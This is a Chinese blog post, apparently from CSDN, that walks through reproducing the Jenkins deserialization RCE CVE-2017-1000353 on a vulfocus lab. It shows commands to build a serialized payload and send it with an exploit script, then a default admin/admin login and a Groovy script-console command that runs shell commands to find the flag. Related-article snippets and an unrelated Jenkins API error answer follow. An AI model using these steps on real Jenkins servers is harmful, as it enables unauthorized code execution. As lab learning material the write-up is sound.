[漏洞复现]vulfocus/jenkins-cve_2017_1000353

最新推荐文章于 2024-07-05 10:55:09 发布
最新推荐文章于 2024-07-05 10:55:09 发布
阅读量606 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: jenkins 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/128015060
版权
本文档详细介绍了如何复现Jenkins的反序列化漏洞,该漏洞允许攻击者在目标服务器上执行任意代码。作者首先尝试使用生成的poc工具在Windows和Linux环境下复现,但由于权限问题未能成功。接着,通过弱口令登录Jenkins并使用系统管理中的脚本命令行执行命令,找到了flag。最后,文章提到了漏洞的修复方案,即升级Jenkins版本。
摘要由CSDN通过智能技术生成

文章目录

简介

Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限

建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。

利用工具复现

1.首先下载生成poc工具

执行如下代码,生成字节码文件jenkins_poc.ser,这便是序列化字符串。

java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

我首先在windows10上生成字节码文件,但是说不能进入jarfile,所以就放到了linux上

Error: Unable to access jarfile CVE-2017-1000353-SNAPSHOT-all.jar

2.然后下载exp文件

发送字节码文件

python3 exploit.py http://ip:port jenkins_poc.ser

执行成功后,会在靶机/tmp目录看到success文件。
因为我用的vulfocus复现,无法反弹shell,所以看不到。

经过搜索,发现竟然可以使用默认账号密码登录,上面执行的命令直接无用,最后以软口令完成任务。
使用admin/admin登录成功

在这里插入图片描述
登录成功后,在左边找到系统管理,然后找到脚本命令行,输入

println "ls /tmp".execute().text

在这里插入图片描述

漏洞修复

升级版本

空白行
关注
专栏目录
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
不忘初心,护天下安全!
10-19 1020
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。
jenkins java反序列化_Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
weixin_31308407的博客
02-13 221
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)一、漏洞描述该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。二、漏洞影响版本所有jenkins主版本均受到影响(包括<=2.56版本)所有的jenkins LTS均受到影响(包括&lt...
Jenkins序列化漏洞cve-2017-1000353
weixin_30593443的博客
12-13 449
一、漏洞原理: 本地没有环境:参考:https://blogs.securiteam.com/index.php/archives/3171 进行学习理解记录。 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 1 #可以如下生成 2 session = uuid....
Jenkins远程代码执行漏洞CVE-2017-1000353
公众号shadow sock7
01-31 3098
复现环境: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353 复现 使用Intellij Idea打包java为可执行jar包参考: https://blog.csdn.net/xuemengrui12/article/details/74984731 ...
Jenkins 远程代码执行漏洞CVE-2017-1000353复现
YouthBelief的博客
11-25 5208
所有文章,仅供安全研究与学习之用,后果自负! Jenkins 远程代码执行漏洞CVE-2017-1000353Jenkins 远程代码执行漏洞CVE-2017-1000353)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Jenkins 远程代码执行漏洞CVE-2017-1000353) 0x01 漏洞描述 Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交
jenkins序列化漏洞 cve-2017-1000353
whatday的专栏
06-13 1493
一、漏洞原理: 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 # 可以如下生成 session = uuid.uuid4() 1、首先要发送一个请求,是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向 对应代码段: def Download(url,session): headers = {'Si
从代码层面分析Jenkins未授权访问CVE-2017-1000353
stopys6的博客
09-13 256
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
Jenkins RCE 漏洞CVE-2019-1003000) 复现
玄道的网安博客
09-24 3579
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
vulfocus漏洞复现-初级】solr 代码执行 (CVE-2019-12409)
ll_515的博客
01-20 2311
Apache Solr受影响的版本8.1.1和8.2.0在solr.in.sh配置文件中默认开启了ENABLE_REMOTE_JMX_OPTS配置项,即允许远程加载JMX,导致可远程代码执行。
CVE-2019-1003000 Jenkins RCE 复现
prettyX的博客
06-18 1997
过程 前提,在Kali下安装好docker 准备漏洞环境 git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc pip install -r requirements.txt cd sample-vuln ./run.sh 在进行完上述命令之后,通过如下命令 docker ps 并未发现docker运行实例 通过查.
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3308
基础知识 序列化和反序列化序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞。 反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
Jenkins CVE-2017-1000353远程代码执行漏洞复现
云舒的博客
09-09 1049
Jenkins CVE-2017-1000353远程代码执行漏洞复现
Jenkins远程代码执行漏洞检查(CVE-2017-1000353
weixin_30675247的博客
05-05 254
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限 漏洞影响范围: 所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 测试步骤: 1.下载生成反序列的payload: https://github.com/nobleXu/jenkins 2.生成...
Jenkins-CI 远程代码执行漏洞复现CVE-2017-1000353
最新发布
m0_63082628的博客
07-05 1546
Jenkins-CI 远程代码执行漏洞复现
漏洞复现Jenkins-CI远程代码执行漏洞(CVE-2017-1000353
weixin_43486390的博客
12-18 983
0x01 漏洞描述 Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。 0x02 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1
yang.li_test2_01 create successful Traceback (most recent call last): File "/IP/sip_dv/yang.li/test0612/proc_tools/Jenkins_script/jenkins_create_flow_v2.py", line 34, in <module> create_jenkins_jobs(server, configFileName) File "/IP/sip_dv/yang.li/test0612/proc_tools/Jenkins_script/jenkins_operation/curd_operation.py", line 58, in create_jenkins_jobs server.build_job(jobConfig.jobName) File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 1370, in build_job response = self.jenkins_request(requests.Request( File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 578, in jenkins_request return self._response_handler( File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 539, in _response_handler response.raise_for_status() File "/tools/python/3.10.2/lib/python3.10/site-packages/requests/models.py", line 1021, in raise_for_status raise HTTPError(http_error_msg, response=self) requests.exceptions.HTTPError: 409 Client Error: Conflict for url: http://ci.enflame.cn/job/yang.li_test2_01/build
06-13
根据你的提示信息,我看到你在使用 Python 的 Jenkins 库进行 Jenkins Job 的创建,并且在执行 `server.build_job(jobConfig.jobName)` 时出现了 HTTP 409 Conflict 错误。这个错误通常表示你正在尝试创建一个已经存在的 Job。建议你检查一下你的 Jenkins 中是否已经存在名为 `yang.li_test2_01` 的 Job,如果是的话,可以尝试修改 Job 名称或者使用 Jenkins 库提供的其他方法进行 Job 的更新。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值